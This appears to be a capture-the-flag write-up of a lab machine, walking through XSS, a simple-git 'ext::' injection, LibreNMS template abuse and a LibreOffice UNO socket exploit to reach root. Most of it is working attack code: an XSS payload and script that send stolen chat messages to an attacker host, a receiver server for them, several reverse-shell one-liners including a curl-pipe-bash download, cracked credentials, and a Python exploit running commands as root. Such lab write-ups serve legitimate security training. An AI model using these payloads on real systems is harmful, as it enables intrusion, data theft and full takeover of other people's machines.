Nmap (service scan with OS detection):

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA)
|_  256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
|_http-cors: GET POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only SSH and an nginx-fronted web app on port 80; the root page redirects to /static/index.html.
Register an account on the web app (I used ivan@gmail.com:123456) and type `help` in the chatbot to see which commands it understands.

Is there a second-order SQL injection through the register page? No: every piece of SQL syntax is filtered from the input, the only special character that survives is `@`.
Base64-decoding the `authorization` cookie shows that it is a JWT (header and payload shown decoded, signature left as-is):

Cookie: authorization=Bearer%20{"alg":"HS256","typ":"JWT"}.{"userID":"65effe4fa686df483ce47da7","iat":1710227146}.McTjCzxd8w26XRWH18qDyahlUpgqI-ZA1EAA_NI-KZM

The token is signed with HS256, i.e. HMAC-SHA256 with a symmetric server-side secret, so it cannot be forged without that secret. The `userID` is a 24-hex-digit value, the shape of a MongoDB ObjectId, which becomes relevant later.
Next, test for XSS. `<script>` tags appear to be filtered, so try an event handler instead. Serve a `test.js` from the attacker box:

php -S 0.0.0.0:80

and submit:

<img SRC=p onerror="var script1 = document.createElement('script'); script1.src='http://10.10.16.23/test.js';document.head.appendChild(script1);" />

The image fails to load, `onerror` fires, and the victim's browser fetches `test.js` from my host; the request shows up in the PHP server log, so the payload executes.
The chatbox is backed by socket.io (`socket.io.js` is loaded by the page), and the history can be requested over the socket. So `test.js` acts as a listener in the victim's page: it loads the same-origin socket.io client, opens a socket with the victim's credentials, subscribes to `message` events, asks for the history, and forwards every message it receives, base64-encoded, to my box:

```javascript
// test.js - injected into the victim's page by the <img onerror> payload
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';              // same-origin socket.io client
document.head.appendChild(script);
script.addEventListener('load', function () {
  const res = axios.get(`/user/api/chat`);           // axios is already global on the app page
  const socket = io('/', { withCredentials: true }); // the victim's session cookie is sent
  socket.on('message', (my_message) => {
    // exfiltrate each message, base64-encoded, to the attacker's listener
    fetch("http://10.10.16.23:8000/?d=" + btoa(my_message));
  });
  socket.emit('client_message', 'history');          // ask the bot for the chat history
});
```

Run two PHP servers on the attacker box: one on port 80 serving `test.js`, and one to receive the callbacks. The callback port has to match the one hard-coded in `test.js` (8000 in the script above):

php -S 0.0.0.0:8080
php -S 0.0.0.0:80
Send the `<img>` payload through "Contact_us" again. The history arrives in the listener log as base64:

V3JpdGUgYSBzY3JpcHQgZm9yICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk=

which decodes to: "Write a script for dev-git-auto-update.chatbot.htb to work properly". That reveals a subdomain:

dev-git-auto-update.chatbot.htb

Add it to /etc/hosts:

echo "10.129.237.125 dev-git-auto-update.chatbot.htb" >> /etc/hosts
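A receiver for the callback, as an added example (my code, not part of the original writeup): instead of reading raw base64 out of a `php -S` access log, this small HTTP server decodes the `d` parameter that `test.js` sends and prints the chat message. The listening port (8000) and the parameter name (`d`) are taken from the payload above; the sample request is constructed from the callback the writeup received. The one edge case worth handling is that `btoa` output can contain `+`, `/` and `=`, which the browser sends unencoded, so the value must be percent-decoded without turning `+` into a space (which `parse_qs` would do).

```python
"""Receiver for the XSS exfiltration callback (added example, not the writeup's code)."""
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

LISTEN_PORT = 8000   # assumption: the port hard-coded in test.js
PARAM_NAME = "d"     # assumption: the query parameter used by test.js


def extract_param(path: str, name: str) -> str:
    """Return a query parameter's value, percent-decoded only.

    parse_qs()/unquote_plus() would also map '+' to a space, which corrupts
    base64 that the browser sent unencoded; unquote() leaves '+' alone.
    """
    query = urlsplit(path).query
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def decode_message(value: str) -> bytes:
    """Base64-decode a value, restoring any '=' padding a log or proxy dropped."""
    value = value.strip()
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value)


def decode_exfil(path: str) -> str:
    """Request path of one callback -> the chat message it carried."""
    raw = decode_message(extract_param(path, PARAM_NAME))
    return raw.decode("utf-8", "replace")


class ExfilHandler(BaseHTTPRequestHandler):
    """Prints each decoded message and answers 204 so the victim page stays quiet."""

    def do_GET(self) -> None:
        print(f"[{self.client_address[0]}] {decode_exfil(self.path)}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):  # silence the default access log
        pass


# Constructed sample: the callback from the writeup, exactly as the browser sends it.
SAMPLE_PATH = "/?d=V3JpdGUgYSBzY3JpcHQgZm9yICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk="

if __name__ == "__main__":
    print("self-test:", decode_exfil(SAMPLE_PATH))
    HTTPServer(("0.0.0.0", LISTEN_PORT), ExfilHandler).serve_forever()
```

Run it in place of `php -S 0.0.0.0:8000`; each history message then appears decoded, one per line, as the victim's browser delivers it.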
The vhost is a git auto-update application, and the page shows its library version:

simple-git v3.14

Searching for that version turns up the `ext::` transport remote code execution: the library hands the repository URL to git, and git's `git-remote-ext` helper runs the command named after `ext::` to reach the "remote". First attempt:

ext::sh -c bash -i >& /dev/tcp/10.10.16.23/6666 0>&1

This does not work. git-remote-ext splits the text after `ext::` on unescaped spaces and execs the result directly (no shell in between), so `sh -c` receives only `bash` as its command string and the rest of the one-liner becomes stray arguments.
So put the reverse shell in a file instead. Create `rev.sh`:

```bash
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.16.23/6666 0>&1"
```

Serve it from the attacker box:

php -S 0.0.0.0:8000

Start a listener on port 6666 and submit this URL:

ext::sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2

In git-remote-ext syntax `% ` (a percent sign followed by a space) is a literal space inside a single argument, so `sh -c` now receives `curl http://10.10.16.23:8000/rev.sh|bash` as one command string; the trailing `>&2` only ends up in `$0`. The target fetches `rev.sh`, pipes it into bash, and the reverse shell connects back.
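Why the first `ext::` payload fails and the second works, as an added example (my code, not the writeup's and not git's): a simplified model of the argument splitting documented in git-remote-ext(1). It assumes the helper splits on unescaped spaces, treats `% ` as a literal space, `%%` as a literal percent, `%S`/`%s` as the service name, rejects other placeholders, and execs argv[0] directly rather than through a shell. The two addresses are the ones used above.

```python
"""Model of git-remote-ext argument splitting (added example, not git's code)."""
from typing import List


def split_ext_command(address: str, service: str = "git-upload-pack") -> List[str]:
    """Turn the text after `ext::` into the argv the helper would exec.

    Assumption: this mirrors the escapes listed in git-remote-ext(1);
    %G and %V (virtual-host placeholders) are left out for brevity.
    """
    argv: List[str] = []
    current = ""
    i = 0
    while i < len(address):
        ch = address[i]
        if ch == "%":
            if i + 1 >= len(address):
                raise ValueError("dangling % at end of ext:: address")
            esc = address[i + 1]
            if esc == " ":            # `% ` -> literal space, does NOT split
                current += " "
            elif esc == "%":          # `%%` -> literal percent sign
                current += "%"
            elif esc == "S":          # `%S` -> service name, e.g. git-upload-pack
                current += service
            elif esc == "s":          # `%s` -> service name without the git- prefix
                current += service[4:] if service.startswith("git-") else service
            else:                     # assumption: unknown placeholders are an error
                raise ValueError(f"bad remote-ext placeholder %{esc}")
            i += 2
            continue
        if ch == " ":                 # unescaped space separates arguments
            if current:
                argv.append(current)
                current = ""
        else:
            current += ch
        i += 1
    if current:
        argv.append(current)
    return argv


def sh_c_command(argv: List[str]) -> str:
    """What `sh -c` actually runs: only the single argument following -c."""
    if len(argv) >= 3 and argv[0] == "sh" and argv[1] == "-c":
        return argv[2]
    return ""


# The two addresses tried in the writeup (without the leading `ext::`).
FAILED = "sh -c bash -i >& /dev/tcp/10.10.16.23/6666 0>&1"
WORKED = "sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2"

if __name__ == "__main__":
    for addr in (FAILED, WORKED):
        argv = split_ext_command(addr)
        print(f"ext::{addr}")
        print(f"  argv       = {argv}")
        print(f"  sh -c runs = {sh_c_command(argv)!r}")
```

For the failed address `sh -c` runs just `bash` (with `-i`, `>&`, the /dev/tcp path and `0>&1` as positional parameters it never looks at), so there is no redirection and no connect-back; for the working one the whole `curl ...|bash` pipeline is a single argument.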
Enumerating the filesystem under /var shows a MongoDB instance. In the mongo shell:

show dbs
use testing
show collections

The `testing` database has two collections. List the users:

db.users.find()

```
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTAyOTE2NTF9.LSLn0klkH_MWk5-iMr2fPjDzcklg6sSrg-037lP6iIY", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
```

The admin document also stores its bearer token in clear, in the same JWT format as the cookie seen earlier.
Two bcrypt hashes (`$2b$`, cost factor 10). Save them as user:hash pairs in a file named `hashes`:

admin:$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.
frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6

Crack them with hashcat (mode 3200 is bcrypt; `--username` tells it to ignore the `user:` prefix):

hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username

bcrypt at cost 10 is slow, and only one password falls to rockyou:

frank_dorky:manchesterunited

The password is reused for SSH:

ssh frank_dorky@10.129.237.125

Initial access.
frank_dorky has no sudo rights, so run linpeas. It highlights one capability:

/usr/bin/python3.10 cap_net_raw=eip

This is a distraction: cap_net_raw only permits raw and packet sockets (sniffing, crafting packets), it does not give a path to root.
linpeas also shows services listening on unusual local ports, so forward one of them over SSH:

ssh -L 3001:127.0.0.1:3000 frank_dorky@10.129.237.125

It is LibreNMS. Googling the version gives no ready privilege-escalation exploit, and frank_dorky's account has no permissions inside the application.

An article on bypassing LibreNMS permission limits points at the bundled `adduser.php` script, which creates a user from the command line; level 10 is the admin level:

./adduser.php test test 10

Logging in as test:test produces an error page; see the debug output. The forwarded local port also has to be 3000 rather than 3001 (I switched to Kali at this point), and the host needs a hosts entry:

echo "127.0.0.1 librenms.com" >> /etc/hosts
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.129.237.125
Enumerating the application as the new admin, I found the templates feature. LibreNMS templates are Laravel Blade, and Blade's `@php ... @endphp` directive runs arbitrary PHP when the template is rendered. Following the article, a template body of:

@php system("bash -c 'bash -i >& /dev/tcp/10.10.16.23/6666 0>&1'");@endphp

writes the reverse shell into the template, and it executes automatically when LibreNMS renders it. That gives a shell as the librenms user.
Check the environment variables of the librenms process:

env

A password is sitting in the environment:

mychemicalformulaX

Try it for the other local user, kai_relay:

ssh kai_relay@10.129.237.125
kai_relay may run /usr/bin/office.sh with sudo. The script:

```bash
#!/bin/bash
/usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
```

It starts a headless LibreOffice Calc as root with the UNO remote bridge (URP over a TCP socket) listening on localhost:2002. The UNO bridge has no authentication: anything that can reach the port gets the full LibreOffice API inside the root process.
A search for exploiting an exposed UNO socket gives the usual approach: connect with the `uno` Python bindings, resolve the remote component context and use the `SystemShellExecute` service, which runs a program in the context of the soffice process. Save as `exp.py`:

```python
import argparse
import uno

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()

# Local UNO component context and the resolver used to reach a remote soffice
localContext = uno.getComponentContext()
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext
)

# Connect to the soffice instance listening on the URP socket
print("[+] Connecting to target...")
context = resolver.resolve(
    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))

# SystemShellExecute runs a command as the user owning the soffice process (root here)
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
# execute(command, parameters, flags); flag 1 = NO_SYSTEM_ERROR_MESSAGE
shell_execute.execute("cat", '/root/root.txt', 1)
```

Two sessions as kai_relay on the target: in the first, start the listener as root:

sudo /usr/bin/office.sh

In the second, run the exploit against it (the `uno` module ships with LibreOffice, so this runs on the box itself):

python3 exp.py --host 127.0.0.1 --port 2002

`cat` inherits soffice's stdout, so the root flag is printed in the first session, the one running office.sh.